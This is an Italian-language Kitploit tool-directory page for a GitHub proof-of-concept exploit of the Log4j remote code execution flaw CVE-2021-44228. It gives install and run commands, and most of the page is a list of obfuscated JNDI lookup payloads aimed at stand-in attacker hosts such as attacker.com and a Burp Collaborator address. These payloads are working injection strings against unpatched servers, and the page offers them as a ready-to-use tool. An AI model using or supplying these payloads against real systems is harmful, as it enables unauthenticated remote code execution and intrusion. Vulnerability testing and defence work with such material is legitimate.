Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
exploit-CVE-2021-44228 — Questa è una prova di concetto di exploit per Log4j RCE Unauthenticated (CVE-2021-44228). | Kitploit
Strumenti/GitHubGitHub/pedrohavay/exploit-cve-2021-44228
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneSviluppo Payload
GitHubpedrohavay/exploit-cve-2021-44228

exploit-CVE-2021-44228

Questa è una prova di concetto di exploit per Log4j RCE Unauthenticated (CVE-2021-44228).

Vedi Repository
203124 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2021-44228 – Log4j RCE non autenticato

Informazioni

Questo è un exploit proof-of-concept per Log4j RCE non autenticato (CVE-2021-44228).

Questa vulnerabilità interessa le versioni < 2.15.0.

Per maggiori informazioni:

https://www.fastly.com/blog/digging-deeper-into-log4shell-0day-rce-exploit-found-in-log4j

Collaboratori

@pedrohavay

Declinazione di responsabilità

Questo progetto è creato esclusivamente per scopi educativi e non può essere utilizzato per violare la legge o per guadagno personale.

L'autore di questo progetto non è responsabile per eventuali danni causati dai materiali di questo progetto.

Demo

immagine

Installazione

root@kitploit:~
git clone https://github.com/pedrohavay/exploit-CVE-2021-44228
cd exploit-CVE-2021-44228
pip install -r requirements.txt

Utilizzo

  1. Usa lo script

    root@kitploit:~
     python3 main.py
    

Payloads

root@kitploit:~
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a}
${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a}
${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:ldap://localhost:12345/Exploit}

Requisiti

  • Python 3
  • Java (JDK)
Scarica lo strumento